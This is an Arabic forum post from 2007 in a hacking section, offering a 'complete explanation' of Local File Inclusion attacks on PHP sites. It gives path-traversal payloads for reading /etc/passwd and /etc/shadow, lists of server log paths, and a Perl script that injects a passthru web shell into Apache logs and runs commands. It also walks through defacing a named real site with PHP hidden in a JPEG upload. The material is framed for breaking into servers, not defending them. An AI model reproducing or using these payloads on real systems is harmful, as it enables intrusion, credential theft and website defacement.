هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.



 
الرئيسيةأحدث الصورالتسجيلدخول

 

 شرح كامل عن ثغرات Local File Inclusion

اذهب الى الأسفل 
كاتب الموضوعرسالة
saif-aleslam
عضو متميز
عضو متميز
saif-aleslam


عدد الرسائل : 265
تاريخ التسجيل : 24/11/2007

شرح كامل عن ثغرات Local File Inclusion Empty
مُساهمةموضوع: شرح كامل عن ثغرات Local File Inclusion   شرح كامل عن ثغرات Local File Inclusion I_icon_minitimeالإثنين ديسمبر 31, 2007 10:10 am

شرح كامل عن ثغرات Local File Inclusion <hr SIZE=1>شرح كامل عن ثغرات Local File Inclusion Smile
بسم الله الرحمن الرحيم
النهاردا هنشرح شرح كامل عن ثغرات ال Local File Inclusion
انت تفحص اسكربت مثلا للبحث عن ثغرات فوجدة هذا الكود
كود:
<?php
$page = $_GET[page];
include($page);
?>
هذا يعنى بوجود ثغرة من نوع Local File Inclusion
طيب تقولى اية المتغير تبع هذا الكود اقولك المتغير بيكون هكذا: (page)
طيب كيف الاستثمار يا بطل اقولك الاستثمار سهل جدا
وهو يكون كا التالى :
كود:
victim.com/index.php?page=../../../../../../../etc/ passwd
index.php : دا الملف الى فية الكود المصاب pages دا المتغير وهكذا سوف يظهر ليك الاسم وباسورد المواقع الى على السرفر تقولى ازاى اقول شوف
زى مانتم شيفين الصندوق الى بالون الاحمر دا يعتبر اليوزر والون الاخر دا الباس مشفر يكون على هذا الرتم دائما
كود:
username: passwd:UID:GID:full_name:directory:shell
اما السرفر الى بنشرح علية يكون بهذا الطريقة مشفر :
كود:
username:x:503:100:FullName:/home/username:/bin/sh
ودى بعض الاوامر ممكن تسخدمها لطلب اليوزر والياسورد فى السرفر
كود:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
وهذا ايظا نفس الشكل شوف معاى :
كود:
<?php
$page = $_GET["page"];
include("$page.php");
?>
ويكون الاستغلال كما شرحنا هكذا :
كود:
victim.com/index.php?file=../../../../../../../../ etc/passwd%00
اواامر راح تفيدك :
كود:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
معى ايضا اسكربت من نوع بيرل يمكن من خلالة الحقن الملفات شوف معاى
كود:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="<? passthru(\$_GET[cmd]) ?>";
$log = "../../../../../../../etc/httpd/logs/error_log";
print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path.$code." HTTP/1.1\r\n";
print $socket "User-Agent: ".$code."\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "\nCode $code sucssefully injected in $log \n";
print "\nType command to run or exit to end: ";
$cmd = <STDIN>;
while($cmd !~ "exit") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($show = <$socket>)
{
print $show;
}
print "Type command to run or exit to end: ";
$cmd = <STDIN>;
}
التغيرات تقوم بتغير ال victim.com ل اسم الموقع و folder الى انت فية وتغير ال index.php ب المملف الى عاوز تحقن بية تمام كدا ؟
تمام اوى كدا هذا كان شرح على كيفية الاكتشاف والاستغلال طيب انا بشرح طريقة كيفية الاختراق من هذة الثغرة
الكل يترك ها الثغرة ولاكن انها ثغرة قوية جدا :
طيب انا معاى موقع مصاب بصرف النظر عن نوع الاسكربت والى معاى النهاردا 4images
كود:
http://www.sfhs.eget.net/gallery/index.php?template=../../../../../../../etc/passwd%00
طيب كدا فى ثغرة فى ها الملف واكيد الكل عرفها طيب وبعدين اقولك
دور على اى مركز تحميل فى الموقع اكيد راح تلاقى مثل فى المنتديات مركز تحميل من اى نوع اكيد بتلاقى طيب وبعدين يا عم ؟!!!
دور على اى صورة على الجهاز ياريت تكون صورة عادية
ونروح للبرنامج اسمه EdjpgCom.exe
نعمل ادد على الصورة ونضيف اى كود بتريدة ,,, وانا معاى طريقة تجعلك تخترق على طول بدون قلق عن طريق التغير فى الرئسية
بكتابة الكود هذا فقط ؟؟؟
كود:
<? ob_clean(); system (" echo Mohandko... WaS... hErE index.php"); die; ?>
غير الكلام الى هنا والى تريدة سوف يظهر فى الرئسية
عن طريق طلب الصورة مثلا احنا رفعنها على مركز تحميل وكان الامتداد كدا
كود:
victim.com/forum/uploads/mohandko.jpg
ازاى بقى تسطعرضها هقولك سهلة جدا
كود:
victim.com/index.php=../../../../../../../../../forum/uploads/mohandkor.jpg
ومش لازم ترفع على الموقع هذا ممكن ترفعه على اى موقع بالسرفر اكيد بتلاقى موقع فية مركز رفع وتطلبة كدا مثلا :
كود:
victim.com/index.php=../../../../../../../../../ho me/user/public_html/forum/uploads/mohandko.jpg
بعد الاستعراض الصورة روح اعمل رفرش راح تلاقى الاندكس تبعك
لتحميل برنامج EdjpgCom
www.shr7.org/Mohandko/EdjpgCom.rar
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
شرح كامل عن ثغرات Local File Inclusion
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» Oxygen Phone Manager II 2.7 Retail كامل ومع الكراك

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
 :: منتدى اختراق الأجهزة والسيرفرات والسبيبر نت-
انتقل الى: